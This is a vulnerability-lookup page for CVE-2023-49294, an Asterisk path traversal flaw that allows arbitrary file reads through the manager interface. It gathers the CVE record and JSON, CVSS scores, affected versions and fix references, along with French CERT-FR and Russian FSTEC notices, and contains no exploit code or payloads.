CVE-2023-49294 (GCVE-0-2023-49294)

Vulnerability from cvelistv5 – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18

Title

Asterisk Path Traversal vulnerability

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.

Severity

4.9 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/asterisk/asterisk/security/adv…	x_refsource_CONFIRM
https://github.com/asterisk/asterisk/commit/424be…	x_refsource_MISC
https://github.com/asterisk/asterisk/blob/master/…	x_refsource_MISC
https://lists.debian.org/debian-lts-announce/2023…

Impacted products

1 product

Vendor	Product	Version
asterisk	asterisk	Affected: < 18.20.1 Affected: >= 19.0.0, < 20.5.1 Affected: = 21.0.0 Affected: < 18.9-cert6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T21:53:45.375Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "asterisk",
          "vendor": "asterisk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 18.20.1"
            },
            {
              "status": "affected",
              "version": "\u003e= 19.0.0, \u003c 20.5.1"
            },
            {
              "status": "affected",
              "version": "= 21.0.0"
            },
            {
              "status": "affected",
              "version": "\u003c 18.9-cert6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-29T00:06:21.896Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
        },
        {
          "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
        },
        {
          "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
        }
      ],
      "source": {
        "advisory": "GHSA-8857-hfmw-vg8f",
        "discovery": "UNKNOWN"
      },
      "title": "Asterisk Path Traversal vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-49294",
    "datePublished": "2023-12-14T19:40:46.157Z",
    "dateReserved": "2023-11-24T16:45:24.314Z",
    "dateUpdated": "2025-02-13T17:18:40.277Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2023-49294",
      "date": "2026-05-26",
      "epss": "0.17085",
      "percentile": "0.95082"
    },
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"18.20.1\", \"matchCriteriaId\": \"A49E9157-3440-47C5-B730-B1F3BE7240C9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*\", \"versionStartIncluding\": \"19.0.0\", \"versionEndExcluding\": \"20.5.1\", \"matchCriteriaId\": \"FCA06EB6-E31A-43B2-A750-186255114B8F\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D3E690E3-3E92-42ED-87DD-1C6B838A3FF9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2AFE2011-05AA-45A6-A561-65C6C664DA7B\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*\", \"matchCriteriaId\": \"C1117AA4-CE6B-479B-9995-A9F71C430663\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*\", \"matchCriteriaId\": \"775041BD-5C86-42B6-8B34-E1D5171B3D87\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*\", \"matchCriteriaId\": \"55EC2877-2FF5-4777-B118-E764A94BCE56\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*\", \"matchCriteriaId\": \"EB0392C9-A5E9-4D71-8B8D-63FB96E055A5\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*\", \"matchCriteriaId\": \"09AF962D-D4BB-40BA-B435-A59E4402931C\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*\", \"matchCriteriaId\": \"559D1063-7F37-44F8-B5C6-94758B675FDF\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*\", \"matchCriteriaId\": \"185B2B4B-B246-4379-906B-9BDA7CDD4400\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*\", \"matchCriteriaId\": \"73D3592D-3CE5-4462-9FE8-4BCB54E74B5B\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*\", \"matchCriteriaId\": \"B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*\", \"matchCriteriaId\": \"1EAD713A-CBA2-40C3-9DE3-5366827F18C7\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*\", \"matchCriteriaId\": \"A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*\", \"matchCriteriaId\": \"F9B96A53-2263-463C-9CCA-0F29865FE500\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*\", \"matchCriteriaId\": \"A53049F1-8551-453E-834A-68826A7AA959\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*\", \"matchCriteriaId\": \"B224A4E9-4B6B-4187-B0D6-E4BAE2637960\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*\", \"matchCriteriaId\": \"9501DBFF-516D-4F26-BBF6-1B453EE2A630\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*\", \"matchCriteriaId\": \"9D3E9AC0-C0B4-4E87-8D48-2B688D28B678\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*\", \"matchCriteriaId\": \"1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*\", \"matchCriteriaId\": \"E27A6FD1-9321-4C9E-B32B-D6330CD3DC92\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*\", \"matchCriteriaId\": \"B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*\", \"matchCriteriaId\": \"4C75A21E-5D05-434B-93DE-8DAC4DD3E587\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*\", \"matchCriteriaId\": \"1D725758-C9F5-4DB2-8C45-CC052518D3FD\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*\", \"matchCriteriaId\": \"B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*\", \"matchCriteriaId\": \"79EEB5E5-B79E-454B-8DCD-3272BA337A9E\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*\", \"matchCriteriaId\": \"892BAE5D-A64E-4FE0-9A99-8C07F342A042\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*\", \"matchCriteriaId\": \"1A716A45-7075-4CA6-9EF5-2DD088248A5C\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*\", \"matchCriteriaId\": \"80EFA05B-E22D-49CE-BDD6-5C7123F1C12B\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*\", \"matchCriteriaId\": \"20FD475F-2B46-47C9-B535-1561E29CB7A1\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.\"}, {\"lang\": \"es\", \"value\": \"Asterisk es un conjunto de herramientas de telefon\\u00eda y centralita privada de c\\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\\u00f3n para este problema.\"}]",
      "id": "CVE-2023-49294",
      "lastModified": "2024-11-21T08:33:12.447",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\", \"baseScore\": 4.9, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 3.6}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}]}",
      "published": "2023-12-14T20:15:52.730",
      "references": "[{\"url\": \"https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-49294\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-12-14T20:15:52.730\",\"lastModified\":\"2024-11-21T08:33:12.447\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.\"},{\"lang\":\"es\",\"value\":\"Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":4.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.2,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"18.20.1\",\"matchCriteriaId\":\"A49E9157-3440-47C5-B730-B1F3BE7240C9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"19.0.0\",\"versionEndExcluding\":\"20.5.1\",\"matchCriteriaId\":\"FCA06EB6-E31A-43B2-A750-186255114B8F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D3E690E3-3E92-42ED-87DD-1C6B838A3FF9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2AFE2011-05AA-45A6-A561-65C6C664DA7B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*\",\"matchCriteriaId\":\"C1117AA4-CE6B-479B-9995-A9F71C430663\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"775041BD-5C86-42B6-8B34-E1D5171B3D87\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"55EC2877-2FF5-4777-B118-E764A94BCE56\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"EB0392C9-A5E9-4D71-8B8D-63FB96E055A5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"09AF962D-D4BB-40BA-B435-A59E4402931C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*\",\"matchCriteriaId\":\"559D1063-7F37-44F8-B5C6-94758B675FDF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*\",\"matchCriteriaId\":\"185B2B4B-B246-4379-906B-9BDA7CDD4400\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"73D3592D-3CE5-4462-9FE8-4BCB54E74B5B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"1EAD713A-CBA2-40C3-9DE3-5366827F18C7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*\",\"matchCriteriaId\":\"A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9B96A53-2263-463C-9CCA-0F29865FE500\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*\",\"matchCriteriaId\":\"A53049F1-8551-453E-834A-68826A7AA959\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*\",\"matchCriteriaId\":\"B224A4E9-4B6B-4187-B0D6-E4BAE2637960\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*\",\"matchCriteriaId\":\"9501DBFF-516D-4F26-BBF6-1B453EE2A630\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*\",\"matchCriteriaId\":\"9D3E9AC0-C0B4-4E87-8D48-2B688D28B678\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*\",\"matchCriteriaId\":\"E27A6FD1-9321-4C9E-B32B-D6330CD3DC92\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*\",\"matchCriteriaId\":\"B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*\",\"matchCriteriaId\":\"4C75A21E-5D05-434B-93DE-8DAC4DD3E587\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*\",\"matchCriteriaId\":\"1D725758-C9F5-4DB2-8C45-CC052518D3FD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*\",\"matchCriteriaId\":\"B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*\",\"matchCriteriaId\":\"79EEB5E5-B79E-454B-8DCD-3272BA337A9E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*\",\"matchCriteriaId\":\"892BAE5D-A64E-4FE0-9A99-8C07F342A042\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A716A45-7075-4CA6-9EF5-2DD088248A5C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*\",\"matchCriteriaId\":\"80EFA05B-E22D-49CE-BDD6-5C7123F1C12B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*\",\"matchCriteriaId\":\"20FD475F-2B46-47C9-B535-1561E29CB7A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

CERTFR-2023-AVI-1040

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités ont été découvertes dans les produits Asterisk. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données et un problème de sécurité non spécifié par l'éditeur.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Asterisk	Asterisk	Asterisk Open Source versions 20.x.x antérieures à 20.5.1
Asterisk	Asterisk	Asterisk Open Source versions 21.0.x antérieures à 21.0.1
Asterisk	Certified Asterisk	Certified Asterisk versions 18.9-cert5 et antérieures
Asterisk	Asterisk	Asterisk Open Source versions antérieures à 18.20.1

References

Title

Publication Time

CERTFR-2023-AVI-1040

Vulnerability from certfr_avis - Published: - Updated:

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Asterisk	Asterisk	Asterisk Open Source versions 20.x.x antérieures à 20.5.1
Asterisk	Asterisk	Asterisk Open Source versions 21.0.x antérieures à 21.0.1
Asterisk	Certified Asterisk	Certified Asterisk versions 18.9-cert5 et antérieures
Asterisk	Asterisk	Asterisk Open Source versions antérieures à 18.20.1

References

Title

Publication Time

BDU:2023-08871

Vulnerability from fstec - Published: 14.12.2023

Title

Уязвимость интерфейса AMI (Asterisk Managment Interface) систем управления IP-телефонией Asterisk и Certified Asterisk, позволяющая нарушителю получить доступ на чтение произвольных файлов

Description

Уязвимость интерфейса AMI (Asterisk Managment Interface) систем управления IP-телефонией Asterisk и Certified Asterisk связана с неверным ограничением имени пути к каталогу с ограниченным доступом. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, получить доступ на чтение произвольных файлов с помощью команды GetConfig

